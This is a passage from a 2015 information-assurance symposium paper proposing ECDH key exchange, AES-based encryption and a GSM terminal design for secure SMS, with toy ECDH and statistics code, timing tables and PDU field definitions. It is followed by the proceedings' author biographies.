No party other than MS1 can determine MS1's private key, unless that party can solve the elliptic curve Discrete Logarithm problem and MS2's private key is similarly secure. No party other than MS1 or MS2 can compute the shared secret, unless that party can solve the Elliptic Curve Diffie-Hellman problem.
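The whole ECDH exchange can be demonstrated on a tiny textbook curve. The curve y^2 = x^3 + 2x + 2 over F_17 with generator G = (5, 1) is a standard teaching example and is cryptographically worthless; real systems use standardized curves such as P-256, and the fixed private keys below stand in for Kc-derived values.

```python
# Toy ECDH over y^2 = x^3 + 2x + 2 (mod 17), generator G = (5, 1).
p, a = 17, 2
G = (5, 1)

def point_add(P, Q):
    """Add two curve points; None represents the point at infinity."""
    if P is None:
        return Q
    if Q is None:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                   # P + (-P) = infinity
    if P == Q:
        m = (3 * x1 * x1 + a) * pow(2 * y1, p - 2, p) % p   # tangent slope
    else:
        m = (y2 - y1) * pow(x2 - x1, p - 2, p) % p          # chord slope
    x3 = (m * m - x1 - x2) % p
    return (x3, (m * (x1 - x3) - y1) % p)

def scalar_mult(d, P):
    """Compute d*P by double-and-add."""
    R = None
    while d:
        if d & 1:
            R = point_add(R, P)
        P = point_add(P, P)
        d >>= 1
    return R

d1, d2 = 5, 7                    # private keys (Kc-derived in the proposal)
Q1 = scalar_mult(d1, G)          # public keys exchanged between MS1 and MS2
Q2 = scalar_mult(d2, G)

S1 = scalar_mult(d1, Q2)         # computed at MS1
S2 = scalar_mult(d2, Q1)         # computed at MS2
assert S1 == S2                  # shared point; its x-coordinate Xk is the key
```

The equality S1 == S2 is exactly d1*d2*G = d2*d1*G; recovering d1 from Q1 would require solving the elliptic curve discrete logarithm problem.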


B. Symmetric Encryption Approach and Experimental Setup

In J2ME, the WMA (Wireless Messaging API) provides tools for sending and receiving SMS messages. Our solution, based on symmetric cryptography (DES, Triple DES, and AES), is simulated with a Java MIDlet, an application written in Java for the Micro Edition platform. The application can send and receive SMS messages in binary format using the WMA. Since the J2ME environment does not contain cryptographic algorithms, we use the Lightweight API from the Legion of the Bouncy Castle. The symmetric algorithms DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES have been implemented.

The standard key sizes for DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES are 64 bits (of which 56 are used), 112 bits, 168 bits, and 128 bits respectively. Fig. 9 and Fig. 10 show the results observed for encryption and decryption with DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES. The results show that, of these algorithms, AES takes almost the minimum time to encrypt and decrypt SMS of various sizes, where one SMS is 160 characters. For an input of 160 characters, the algorithms DES, AES, TripleDES2K, and TripleDES3K generate ciphertexts of 143, 80, 160, and 168 characters respectively; these results can be found in Table I. This shows that AES is the best option for this purpose. The results are calculated over 30 repeated executions of each algorithm. We also calculated the 95% confidence interval (CI) for each algorithm with 160-character input, because the reported margin of error is typically about twice the standard deviation (the radius of a 95% confidence interval) [18], similar to that described in [23].


Fig. 9. Encryption using DES, T-DES, and AES


Fig. 10. Decryption using DES, T-DES, and AES

TABLE I. SMS SIZE PAIR (ORIGINAL, CIPHER) IN VARIOUS ALGORITHMS

DES: (160, 143)   AES: (160, 80)   TripleDES2K: (160, 160)   TripleDES3K: (160, 168)

Tables II and III present the confidence intervals for encryption and decryption of the message (SMS) for lengths of 160, 160x2, 160x3, 160x4, and 160x5 characters for the DES, TripleDES2K, TripleDES3K, and AES algorithms. The confidence intervals are measured in nanoseconds, and the t-distribution is used to calculate all these parameters. In this process, SMS sizes from 160 to 800 characters were evaluated; a message of more than 160 characters must be broken up and concatenated across multiple SMS. A low standard deviation indicates that the data points tend to be very close to the mean, whereas a high standard deviation indicates that they are spread over a large range of values. Thus AES, which keeps tightly to its output range, is considered the best of the group.

TABLE II. CONFIDENCE INTERVAL FOR SMS ENCRYPTION (NANOSECONDS)

Algorithm | CI-160 char       | CI-160x2 char     | CI-160x3 char     | CI-160x4 char     | CI-160x5 char
DES       | 615156 to 2525227 | 444939 to 2337297 | 397177 to 2334366 | 418794 to 2385118 | 430900 to 2396306
T-DESK2   | 423715 to 2437266 | 384923 to 2548397 | 480270 to 2696873 | 448570 to 2578392 | 533472 to 2694613
T-DESK3   | 294704 to 2301896 | 337878 to 2407877 | 332541 to 2398940 | 346447 to 2530239 | 371517 to 2538104
AES       | 775058 to 2017472 | 515608 to 1802398 | 14850 to 4573891  | 518174 to 1809940 | 549579 to 1850251

TABLE III. CONFIDENCE INTERVAL FOR SMS DECRYPTION (NANOSECONDS)

Algorithm | CI-160 char       | CI-160x2 char     | CI-160x3 char     | CI-160x4 char     | CI-160x5 char
DES       | 629011 to 745390  | 494369 to 750842  | 521460 to 617265  | 539561 to 658254  | 562070 to 666845
T-DESK2   | 520563 to 650413  | 546387 to 716769  | 582147 to 719667  | 623106 to 751108  | 128407 to 3157173
T-DESK3   | 520276 to 645226  | 610201 to 772473  | 577035 to 688952  | 625512 to 851052  | 637007 to 804383
AES       | 548127 to 602172  | 526055 to 603419  | 512970 to 619404  | 667586 to 704277  | 678119 to 732740
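A 95% interval of the kind reported in Tables II and III can be reproduced from 30 timing samples with the t-distribution. In this sketch the sample values are hypothetical, and the t critical value 2.045 for 29 degrees of freedom is taken from a standard t-table.

```python
import statistics

def confidence_interval_95(samples):
    """Two-sided 95% CI for the mean of a small sample (t-distribution)."""
    n = len(samples)
    mean = statistics.mean(samples)
    sem = statistics.stdev(samples) / n ** 0.5   # standard error of the mean
    t_crit = 2.045                               # t-table value for df = 29
    return mean - t_crit * sem, mean + t_crit * sem

# Hypothetical nanosecond timings for one algorithm at one message size:
samples = [600_000 + 10_000 * (i % 7) for i in range(30)]
low, high = confidence_interval_95(samples)
print(f"95% CI: {low:.0f} to {high:.0f} ns")
```

A wide interval, such as the AES 160x3 row of Table II, signals that the underlying timings were highly dispersed rather than that the algorithm was consistently slow.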

C. Discussion

Since we propose the Diffie-Hellman and Elliptic Curve Diffie-Hellman protocols for key exchange, it is necessary to focus on their security aspects. The authors claim that the proposed key exchange algorithm is secure because the public-key exchange also provides integrity and non-repudiation, through a hash function and a digital signature respectively. ECDH is based on elliptic curves and is thus more secure, as every multiplication is performed by repeated additions and it is infeasible to recover the original value by any reversal process. Of the implemented algorithms DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES, the AES algorithm proved best suited for this application. Various attacks have been found on DES and Triple DES, including full attacks, but no full attack has been found on AES. This algorithm can therefore be used for the encryption and decryption process when transmitting a secure message.

V. PROPOSED GSM TERMINAL FOR SECURE SMS

In this section, we propose a terminal through which a secure SMS can be sent or received. Our proposed Terminal for sending/receiving SMS in GSM network is similar to the


M20 terminal [19]. We have incorporated security aspects into the proposed terminal and modified it so that the overhead produced is minimized. The proposed terminal provides authentication, confidentiality, integrity, and non-repudiation services for the transmitted message. For a real GSM network, we propose that the cryptographic algorithms be implemented on the SIM card itself at manufacturing time. In fact, a separate SIM card could be used for security-related communication and transactions, as in South Korea, where separate SIM cards are used for financial transactions. We consider the approach proposed in this paper part of a GSM terminal that provides authentication, confidentiality, and integrity services to the end user. The non-repudiation service can be provided by the DSA/ECDSA (or DSA/variant-of-ECDSA) digital signature algorithms. These algorithms can be stored directly on the SIM (when the GSM terminal is not used) or on the terminal device. The digital signature is applied over the encrypted message; the details of DSA, ECDSA, and the variant of ECDSA can be found in [20]. The proposed GSM terminal supports both SMS modes: SMS Deliver (mobile terminated) and SMS Submit (mobile originated).

A. Design of Proposed Terminal

This subsection describes the architecture of the proposed GSM terminal, shown in Fig. 11, which provides the authentication, confidentiality, integrity, and non-repudiation services needed to secure the transmitted SMS in the network. The data field can occupy at most 140 octets, i.e., 1120 bits, which means 160 English characters fit in a single SMS, since English characters are encoded with a 7-bit encoding scheme (160*7 = 1120 bits). In this proposed terminal we have included one bit to indicate whether encryption is on or off, one bit to select the ciphering algorithm (AES/MAES), one bit to select the data integrity algorithm (SHA1/HMAC), and one bit to select the digital signature algorithm (DSA/ECDSA, or DSA/variant of ECDSA). The various parameters of the proposed GSM terminal in both modes are as follows:

Service Center Address (SCAddr): A maximum of 10 octets, comprising the length (1 octet), the type of number (national/international, 1 octet), and the address of the service center in BCD digits (0-8 octets).

PDU Type: This field is one octet, holding eight parameters of one bit each.

User Data Header Indicator (UDHI): 0 – Contains only short message, 1 – Contains a header in addition of short message.

Msg Type: 0 – SMS Deliver, 1 – SMS Submit; Encryption Set (E Set): 0 – No, 1 – Yes; Ciphering: 0 – AES, 1 – MAES; Integrity: 0 – SHA1, 1 – HMAC; Digital Signature (DSignature): 0 – DSA, 1 – ECDSA (or 0 – DSA, 1 – Variant of ECDSA); More Msg: 0 – No, 1 – Yes; Status Report Indication (SRI): 0 – a report will be returned to the SME, 1 – an SMS will be returned to the SME; Status Report Request (SRR): 0 – No, 1 – Yes.

Note: More Msg and SRI can only be set by the Short Message Service Center. If the E bit is 0, the terminal sends/receives a normal message; if E = 1, the Secure Message mode is activated.
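The eight one-bit parameters of the PDU Type octet can be packed and unpacked with simple bit operations. The paper does not fix an ordering for the bits, so the positions below are an illustrative assumption.

```python
# Illustrative packing of the proposed PDU Type octet.
# Bit positions are assumptions; the text lists the flags but not an ordering.
FLAGS = ["UDHI", "MsgType", "ESet", "Ciphering",
         "Integrity", "DSignature", "MoreMsg", "SRR"]

def pack_pdu_type(**flags) -> int:
    """Pack the named one-bit flags into a single octet."""
    octet = 0
    for bit, name in enumerate(FLAGS):
        if flags.get(name, 0):
            octet |= 1 << bit
    return octet

def unpack_pdu_type(octet: int) -> dict:
    """Recover each flag from the octet."""
    return {name: (octet >> bit) & 1 for bit, name in enumerate(FLAGS)}

# Secure Message mode for SMS Submit: E Set = 1, AES (0), HMAC (1), ECDSA (1).
pdu = pack_pdu_type(MsgType=1, ESet=1, Integrity=1, DSignature=1)
assert unpack_pdu_type(pdu)["ESet"] == 1
assert 0 <= pdu <= 0xFF
```

Keeping all mode selectors in one octet is what lets the terminal stay compatible with the existing SMS PDU layout while adding the security options.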

Source Address (SAddr) / Destination Address (DAddr): This field comprises the length (1 octet), the type of number (national or international, 1 octet), and the source/destination address in BCD digits (0-10 octets).
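The BCD digit fields in the address parameters are commonly stored as GSM "swapped nibble" semi-octets: digits are paired, each pair's nibbles are swapped, and an odd-length number is padded with 0xF. This sketch follows the GSM 03.40 convention, which this proposal appears to reuse.

```python
def encode_bcd(number: str) -> bytes:
    """Encode a decimal number string as GSM swapped-nibble semi-octets."""
    digits = [int(d) for d in number]
    if len(digits) % 2:
        digits.append(0xF)               # pad nibble for odd-length numbers
    return bytes(hi << 4 | lo for lo, hi in zip(digits[::2], digits[1::2]))

def decode_bcd(data: bytes) -> str:
    """Recover the number string, skipping the 0xF pad nibble."""
    out = []
    for b in data:
        out.append(str(b & 0xF))
        if b >> 4 != 0xF:
            out.append(str(b >> 4))
    return "".join(out)

assert encode_bcd("1234").hex() == "2143"
assert decode_bcd(encode_bcd("12345")) == "12345"
```

For example, "1234" becomes the two octets 0x21 0x43, which is why a 10-digit international number fits the field sizes given above.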

Protocol Identifier (ProtocolID): The field by which the transport layer either refers to the higher-layer protocol being used or indicates interworking with a certain type of telematic device.

Fig. 11. Proposed GSM Terminal for Secure SMS


Data Coding Scheme (DCScheme): This field is used to code the data present in ‘Data’ field.

Bits 7-4 (coding group): 0000 – default 7-bit alphabet; 0001-1110 – reserved coding groups; 1111 – bit 2 is not used, and bits 1-0 can take the following values: 00 – immediate display, 01 – mobile equipment specific, 10 – SIM specific, 11 – terminal equipment specific.

Service Center Timestamp (SCTimestamp): By this field, the SMSC informs the recipient MS about the time of arrival of the SMS at transport layer entity of the SMSC. YY-MM-DD-HH-MM-SS-Timezone

Message Identifier (MsgID): Every MsgID is an integer value in the range 0-255 and is generated automatically.

Data Length / Data: The data field carries the actual data being sent (0-140 octets), and the data length (1 octet) gives the total length of that data.

Further information related to the structure of SMS and its parameters can be accessed from GSM 04.08.10.5.4.6 [21].

B. Hardware Requirements and Setup [19]

This subsection discusses the hardware requirements and the setup phase for the proposed GSM terminal. The following hardware is needed to simulate and test our proposed approach in a GSM environment: (1) a mobile phone, (2) a terminal (proposed in this paper), (3) two SIM cards (one for the mobile phone and one for the proposed terminal), (4) a GSM antenna, (5) a power cable for the proposed terminal, (6) an RS-232 cable, (7) a PC running Windows Terminal or HyperTerminal. The steps to set up the hardware are as follows: (1) prepare the mobile phone with a SIM card; (2) terminal setup: run Windows Terminal or HyperTerminal; connect the proposed terminal to COM1 or COM2 of the PC; insert a SIM into the proposed terminal and turn it on; in Windows Terminal, select [Communication] from [Setting] and set the terminal parameters to baud rate 19200 bps, data bits 8, stop bits 1, parity none, flow control hardware, connector COM1 or COM2; finally, reset the proposed terminal to factory defaults using AT&F and configure it for SMS using the various AT commands.

VI. CONCLUSION

We conclude that the proposed approach based on ECDH is suitable for key exchange when transmitting an SMS from one mobile to another. Symmetric algorithms are faster than asymmetric algorithms, so we implemented DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES; of these, AES is the best algorithm for ciphering the SMS during transmission. The authors also proposed a GSM terminal device that provides authentication, confidentiality, integrity, and non-repudiation services for SMS.

ACKNOWLEDGMENT

This work is supported by TCS, India.


10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 72

AUTHOR BIOGRAPHIES

Pradeep K. Atrey is an Assistant Professor at the State University of New York, Albany, NY, USA. He is also an (on-leave) Associate Professor at the University of Winnipeg, Canada and an Adjunct Professor at the University of Ottawa, Canada. He received his Ph.D. in Computer Science from the National University of Singapore, M.S. in Software Systems and B.Tech. in Computer Science and Engineering from India. He was a Postdoctoral Researcher at the Multimedia Communications Research Laboratory, University of Ottawa, Canada. His current research interests are in the area of Security and Privacy with a focus on multimedia surveillance and privacy, multimedia security, secure-domain cloud-based large-scale multimedia analytics, and social media. He has authored/co-authored over 90 research articles in reputed ACM, IEEE, and Springer journals and conferences. His research has been funded by the Canadian Govt. agencies NSERC and DFAIT, and by the Govt. of Saudi Arabia. Dr. Atrey is on the editorial board of several journals including ACM Trans. on Multimedia Computing, Communications and Applications, ETRI Journal, and IEEE Communications Society Review Letters. He was also a guest editor for the Springer Multimedia Systems and Multimedia Tools and Applications journals. He has been associated with over 30 international conferences/workshops in various roles such as General Chair, Program Chair, Publicity Chair, Web Chair, Demo Chair and TPC Member. Dr. Atrey was a recipient of the Erica and Arnold Rogers Award for Excellence in Research and Scholarship (2014), the ETRI Journal Best Editor Award (2012), the ETRI Journal Best Reviewer Award (2009), and three University of Winnipeg Merit Awards for Exceptional Performance (2010, 2012 and 2013). He was also recognized as an "ICME 2011 – Quality Reviewer."

Thomas A. Babbitt is a United States Army Fellow and Doctoral Candidate in the Department of Computer Science, Rensselaer Polytechnic Institute (RPI). He is a former Instructor and Assistant Professor in the Department of Electrical Engineering and Computer Science, United States Military Academy, West Point, and is a member of the IEEE Computer Society and the Association for Computing Machinery. His current research interests include networking, network security, resource-constrained networks, and Computer Science and Information Technology education.

Daniel Bogaard is an Associate Professor in the Information Science and Technologies Department at the Rochester Institute of Technology. He is a distinguished scientist in information delivery, web application development and web security. His teaching and research interests include Web-based communication, security, access, and application development, specifically employing emerging technologies. He has been part of numerous research grants, including awards by the National Science Foundation (NSF), National Institutes of Health (NIH), NYS Department of Health, and Rochester General Hospital.

Anthony Califano is a digital media program manager with the Office of the New York State Comptroller (OSC). His work involves developing social media marketing strategies and associated communications tools that support OSC's programs and initiatives. Before managing social media, he was a web developer and graphic designer specializing in web 2.0, rich internet applications, video production, and multimedia design. He received his M.B.A. with a specialization in Information Technology Management from the University at Albany (SUNY) in 2015, and his B.F.A. in Graphic Design from the Rochester Institute of Technology in 2002. He also received his certification as a usability analyst (CUA) from Human Factors International in July of 2008. His current research interests include smart grid, green energy, cyber security, UX, usability and accessibility issues, and social media.


Reiner Campillo received his M.Sc. (2014) degree in Networking and System Administration from the Rochester Institute of Technology. He is currently technical manager at the National Research and Education Network of the Dominican Republic. His current research interests are data communication protocols, information security and Ethernet technologies.

Ming-Ching Chang is a computer scientist in the Computer Vision Laboratory at the GE Global Research Center in Niskayuna, NY, USA and an adjunct professor in the Computer Science Department at the University at Albany, State University of New York (SUNY). His research areas include computer vision and video analytics. He was a research assistant in the Laboratory for Engineering Man/Machine Systems (LEMS) at Brown University, where he received his doctorate in Engineering in 2008. He was also a research assistant in the Mechanical Industry Research Laboratories, Industrial Technology Research Institute (Taiwan). He received the M.S. degree in computer science and information engineering in 1998 and the B.S. degree in civil engineering in 1996, both from the National Taiwan University. Dr. Chang has authored more than 35 peer-reviewed journal and conference publications. He frequently serves as a reviewer for mainstream journals and conferences.

Manmohan Chaturvedi is a retired Air Commodore from the Indian Air Force with a PhD in the information security domain from IIT Delhi. He has about 35 years of experience in managing technology for the IAF. An alumnus of the National Defense College, New Delhi, he has held various appointments dealing with operational and policy dimensions of Information and Communication Technology. He graduated from the Delhi College of Engineering and completed his post-graduate studies at IIT Delhi. His research interests include the vulnerability of evolving ICT infrastructure and the protection of Critical Information Infrastructure.

Narendra S. Chaudhari completed his undergraduate, graduate, and doctoral studies at the Indian Institute of Technology (IIT), Mumbai, India. He has shouldered many senior-level administrative positions at universities in India and abroad, including Dean of the Faculty of Engineering Sciences, Devi Ahilya University, Indore, India; Coordinator of the International Exchange Program, Nanyang Technological University (NTU), Singapore; and Deputy Director of GameLAB, Nanyang Technological University, Singapore. He has been with the Indian Institute of Technology, Indore, India since Aug 2009 as a Professor of Computer Science and Engineering, and since Sept 2010 he has also been Dean of R&D at IIT Indore. From 2001 to July 2009, he was with the School of Computer Engineering, NTU, Singapore. He has been invited as a keynote speaker at many conferences, and has been a referee and reviewer for a number of premier conferences and journals, including IEEE Transactions and Neurocomputing. He has more than 240 publications in top-quality international conferences and journals. His current research work focuses on network security, algorithms, game AI, grammar learning, and novel neural network models such as binary neural nets and bidirectional nets. His research interests include network protocols, parallel computing, optimization algorithms, and theoretical computer science. He is a Fellow of the Institution of Engineers, India (IE-India), a Fellow of the Institution of Electronics and Telecommunication Engineers (IETE), a Senior Member of the Computer Society of India, a Senior Member of IEEE, a Member of the Indian Mathematical Society, a Member of the Cryptology Research Society of India, and a member of many other professional societies.

Ersin Dincelli is a Ph.D. candidate in the Department of Informatics and an adjunct professor in the Department of Information Technology Management at the University at Albany, the State University of New York. He works as a research analyst at the New York State Center for Information Forensics and Assurance (CIFA) focusing on multiple research projects including investigating cultural and socio-psychological impacts on information security behavior, behavioral differences on online social networks, and self-organization in the context of complex traffic systems. He received his M.B.A. with a specialization in Information Technology Management from the University at Albany, and his B.A. in Economics from Uludag University in Turkey. His research interests are in the area of behavioral security, social engineering, cyber behavior, and social media.

Sanjay Goel is an Associate Professor and Chair of the Information Technology Management Department in the School of Business, and the Director of Research at the NYS Center for Information Forensics and Assurance at UAlbany. He is also the Director of the Digital Forensics Program at the University. Dr. Goel received his Ph.D. in Mechanical Engineering from RPI. His research interests include information security, security of cyber physical systems, music piracy, cyber warfare and self-organization in complex systems. His research on self-organizing systems includes traffic light coordination, smart grid and social networks. He is lead author of the Smart Grid Vision prepared by the IEEE Communications Society and the IEEE Standards Association. He won the Promising Inventor's Award in 2005 from the SUNY Research Foundation. In 2006, he was awarded the SUNY Chancellor's Award for Excellence in Teaching, the UAlbany Excellence in Teaching Award, and the Graduate Student Organization Award for Faculty Mentoring. In 2010 he was awarded the UAlbany Excellence in Research Award. He was also awarded the Excellence in University Service award in 2015 and is the only faculty member in the history of the University who has received excellence awards in all three categories, i.e., research, teaching, and service. He was named one of the three AT&T Industrial Ecology Faculty Fellows for 2009-2010. He has received grant funding from multiple sources including the National Institute of Justice, U.S. Department of Education, National Science Foundation, Region II University Transportation Research Center, New York State Energy Research and Development Agency (NYSERDA), AT&T Foundation and James S. McDonnell Foundation. He has over 75 articles in refereed journals and conference publications including top journals such as the California Management Review, IEEE Journal of Selected Areas in Communication, Decision Support Systems, Communications of the AIS, Communications of the ACM and the Information & Management Journal. In addition, he has been invited to present at 35 conferences including over 10 keynotes and plenary talks. He is a recognized international expert in information security, cyber warfare, and smart grid and has given plenary talks at events across several countries including the U.S., Germany, Russia, Serbia, Croatia, and India that have been sponsored by NATO, OSCE, and other professional organizations. He has given several plenary talks and cyber hacking demonstrations at the NYS Cyber Security Conference to very large audiences. He is a part of the "Group of Experts" for the Organization for Security and Co-operation in Europe's (OSCE) Action against Terrorism Unit as well as the Partnership for Peace Consortium at the Marshall Center in Germany. He is the UAlbany representative of the Capital Region Cyber Crime Partnership and is one of the key members of the international volunteer group Project Grey Goose, which investigates incidents of cyber warfare around the world. He established the Annual Symposium on Information Assurance as an academic symposium held in conjunction with the NYS Cyber Security Conference and has served as its chair. In its tenth year now, it has received universal acclaim from both academics and practitioners in the field. He also initiated and served as the general chair for the International Conference on Digital Forensics and Cyber Crime (ICDF2C) and hosted the first event in Albany in collaboration with the NYS Police and the NYS Department of Criminal Justice Services.

Srishti Gupta is a final-year student in the MS (Software Engineering) program at VIT University, Chennai (India). She has experience working with Government Advisory at KPMG India (Gurgaon) as a summer intern (2014); on analytics with R at Info Edge India Ltd. (Naukri.com) during Dec 2013; with Microsoft India (Gurgaon) during summer 2013; and with the Web Development Group (National Informatics Centre, New Delhi) during Dec 2012. She is a Member of the Computer Society of India (CSI).

Bryan Harmat is a graduate student in the Department of Computing Security at the Rochester Institute of Technology.

Delbert Hart is an Associate Professor in the Computer Science Department at SUNY Plattsburgh. He earned his D.Sc. in Computer Science at Washington University in St. Louis. His research interests are Computer Security, Computer Science Pedagogy, and Distributed Systems.

Hemantha Herath is a Professor of Managerial Accounting in the Goodman School of Business at Brock University. Previously, he was an assistant professor at the University of Northern British Columbia and a consultant in the Oil and Gas Division of The World Bank, Washington D.C. He holds Ph.D. and M.Sc. degrees in Industrial and Systems Engineering from Auburn University, USA. His research interests include real options, risk management, performance measurement, and IT security. He has published articles in a variety of journals including the Journal of Accounting and Public Policy, Journal of Management Information Systems, The Engineering Economist, and Journal of Economics and Finance. He is a two-time recipient of the Eugene L. Grant Best Paper Award from the American Society for Engineering Education (ASEE) (2001 and 2008). He currently serves as an area editor for The Engineering Economist. He is also a member of Sigma Xi, the research honor society.

Tejaswini Herath is an associate professor in the Goodman School of Business at Brock University, Canada. Previously she worked as a systems analyst and part-time lecturer at the University of Northern British Columbia (UNBC), Canada. She graduated from the Department of Management Science and Systems at the State University of New York, Buffalo (UB). She also holds an NSA-certified Certificate in Information Assurance and is a Certified General Accountant (CGA), Canada. She has published articles in the Journal of Management Information Systems, Decision Support Systems, European Journal of Information Systems, and Information Systems Journal, among others.

Yuan Hong is an Assistant Professor in the Department of IT Management, and a faculty associate in the Forensics, Analysis, Complexity, Energy, Transportation and Security (FACETS) Center at the University at Albany, SUNY. He received the Ph.D. degree in Information Technology from Rutgers University, the M.Sc. in Computer Science from Concordia University, Canada, and the B.Sc. from the Beijing Institute of Technology, China. His research interests span a wide range of topics in Security, Privacy, Digital Forensics and Data Analytics, primarily tackling security and privacy issues in various contexts such as web search, data mining, supply chain management, health informatics, smart grid, social networks, location-based services, etc. He has published more than 20 peer-reviewed journal and conference papers in the above areas, including top venues such as IEEE Transactions on Dependable and Secure Computing (TDSC), Journal of Computer Security (JCS), ACM International Conference on Information and Knowledge Management (CIKM), ACM International Conference on Extending Database Technology (EDBT), and IEEE International Conference on Data Mining (ICDM). He also regularly serves as a program committee member and referee for major conferences and journals in the above areas (e.g., TDSC, TKDE, TIFS, TCC, JCS, ESORICS, DBSec).

Daryl Johnson, associate professor of computing security, has developed over thirteen new courses and co-developed over a dozen more in the areas of security, networking, and systems administration, as well as redesigning and contributing to many others. He has been involved in the creation of three departments and five degrees, including the Computing Security department, the Networking, Security and Systems Administration department, and the Information Technology department, and their associated degrees. Most of his attention over the last decade has been in the area of computer and network security, with a focus on covert communication, botnet command and control, mobile security, and the application of virtualization in the security field. He has authored over three dozen papers in the security area. He was one of the founders of the Northeast Collegiate Cyber Competition and served for 8 years as its Red Team Captain.

Shreshth Kandari is a graduate student in the Department of Information Science and Technology at Rochester Institute of Technology.

Victoria Kisekka is a PhD student at the University at Buffalo, School of Management. Her research area is cybersecurity and resilience. Other research interests include patient safety on online social networks. She has received scholarships from the National Science Foundation and the (ISC)² Woman's Scholarship program. Her past experience in cybersecurity was acquired through her role as a research aide at Argonne National Laboratory and as a graduate assistant for the Information Assurance lab at the University at Buffalo. Prior to joining the University at Buffalo, she received a Master's in Information Systems from Drexel University and a Bachelor of Science in Computer Science from Shippensburg University.

Siwei Lyu received his B.S. degree (Information Science) in 1997 and his M.S. degree (Computer Science) in 2000, both from Peking University, China. He received his Ph.D. degree in Computer Science from Dartmouth College in 2005. From 2000 to 2001, he worked at Microsoft Research Asia (then Microsoft Research China) as an Assistant Researcher. From 2005 to 2008, he was a Post-Doctoral Research Associate at the Howard Hughes Medical Institute and the Center for Neural Science of New York University. Starting in 2008, he was Assistant Professor at the Computer Science Department of the University at Albany, State University of New York, and was promoted to Associate Professor in 2014. Dr. Lyu is the recipient of the Alumni Thesis Award of Dartmouth College in 2005, the IEEE Signal Processing Society Best Paper Award in 2010, and the NSF CAREER Award in 2010. He has authored one book, and holds two U.S. patents and one E.U. patent. He has published more than 50 conference and journal papers in the research fields of natural image statistics, digital image forensics, machine learning, and computer vision.

Namunu C. Maddage is a cloud computing executive, data scientist, and technopreneur. He has over 15 years of experience advancing multimedia system technologies to develop web applications for the healthcare, data security, and entertainment sectors in Australia and South East Asia. He serves as an international technology reviewer on the editorial boards of premium computer science conferences and journals. He has published over 50 journal, conference, and patent articles related to digital content analysis and semantic retrieval. In 2013, Dr. Maddage co-founded NextGmultimedia Pty Ltd, a cloud-based multimedia technology development and commercialization company. The NextG team provides end-to-end cloud technology solutions, in close collaboration with universities, research institutes, start-ups, and entrepreneurs, to improve well-being. For example, together with the NextG team, Dr. Maddage developed a cognitive analytic platform in 2014 for a brain training project.

George Markowsky is currently Professor of Computer Science at the University of Maine. He holds a Ph.D. in Mathematics from Harvard University. He spent ten years at the IBM Thomas J. Watson Research Center where he served as Research Staff Member, Technical Assistant to the Director of the Computer Science Department, and Manager of Special Projects. Dr. Markowsky was the Founding Chair of the Computer Science Department. He has served as Chair of the Computer Science Department on numerous occasions, and has also served as Chair of the Mathematics and Statistics Department. He has served as Associate Director of the School of Computing & Information Science at the University of Maine. Dr. Markowsky has held visiting positions at RPI and RIT, as well as serving as Founding Dean of the American-Ukrainian Faculty at the Ternopil National Economic University. He has numerous publications and grants, is currently focusing on cybersecurity, and is the Director of UMaine's Cybersecurity Lab. He also holds a patent in the area of universal hashing. His interests range from pure mathematics to the application of mathematics and computer science to biological problems. George Markowsky was the founding President of the Maine Software Developers Association (MeSDA) from its inception in spring 1993 until May 1998. Dr. Markowsky founded a software company, Trefoil Corporation, in February 1994. Trefoil Corporation developed the O*NET software for the U.S. Department of Labor that replaced the Dictionary of Occupational Titles. The O*NET software was released nationally in 1998.

Leigh A. Mutchler is a Lecturer of Information Management at the University of Tennessee, Knoxville. She received her Ph.D. in MIS from Mississippi State University. Her research interests are primarily in the area of behavioral information security and her work has appeared in the Communications of the AIS, a book chapter, and conference proceedings including the Americas Conference on Information Systems, the Dewald Roode Workshop on Information Systems Security Research, and the National Decision Sciences Institute Annual Conference.

Tae H. Oh received a B.S. degree in Electrical Engineering from Texas Tech University in 1990 and M.S. and Ph.D. degrees in Electrical Engineering from Southern Methodist University (SMU) in 1995 and 2001, respectively. He is an Associate Professor in the Information Sciences and Technology Department at the Rochester Institute of Technology (RIT). His research focus has been in mobile computing, mobile device security, mobile ad hoc networks, and cyber security. Before joining RIT, he gained over 20 years of experience in networking and telecommunication as an engineer and researcher for several telecom and defense companies.

Andrew Pulver is a PhD student at the University at Albany, SUNY. His current areas of interest include computer vision and deep learning.

Nick Roberts is an undergraduate student in the Department of Information Security and Forensics at Rochester Institute of Technology.

Neetesh Saxena received his B.Tech. in computer science & engineering and M.Tech. in information technology degrees, both with honors, from UP Technical University, Lucknow, and Guru Gobind Singh Indraprastha University, Delhi, India, respectively. He completed his Ph.D. in computer science & engineering at the Indian Institute of Technology, Indore, India. He is currently a postdoctoral researcher in the Department of Computer Science, State University of New York (SUNY) Korea, South Korea, and a visiting researcher in the Department of Computer Science, Stony Brook University, USA. His current research interests include smart grid security, cryptography, security in cellular networks, and secure mobile applications. He is a member of several professional bodies including IEEE, ACM, and CSI.

Bill Stackpole has been teaching at the Rochester Institute of Technology since 2001 in the areas of network and system security and computer forensics. Professor Stackpole served as an officer for the IEEE 1910 working group, which is developing a secure alternative to replace current implementations of the Spanning Tree algorithm. He has been involved in a variety of security competitions since 2004. Bill has been in the Northeast Regional Collegiate Cyber Defense Competition since its inception in 2008, serving both on the Red team and as the blue team coach for the RIT student competitors. He also coaches for the National Cyber League and other security events. Current research interests include network security, IDPS tuning, netflow hop analysis, etc. Bill has written numerous papers covering various aspects of the security field and is currently developing a tiered, collegiate Penetration Testing competition to be hosted at RIT in the fall of 2015.

Jared Stroud is a graduate student at the Rochester Institute of Technology where he is pursuing a Master's degree in Computing Security. Jared primarily focuses on application security and offensive tool development.

Boleslaw K. Szymanski is the Claire and Roland Schmitt Distinguished Professor and the Director of the Network Science and Technology Center at Rensselaer Polytechnic Institute. He has published over 300 scientific articles, is a foreign member of the National Academy of Science in Poland and an IEEE Fellow, and was a National Lecturer for the ACM. In 2009, he received the Wilkes Medal of the British Computer Society. His current research interests focus on network science, network resilience and technology-based social networks.

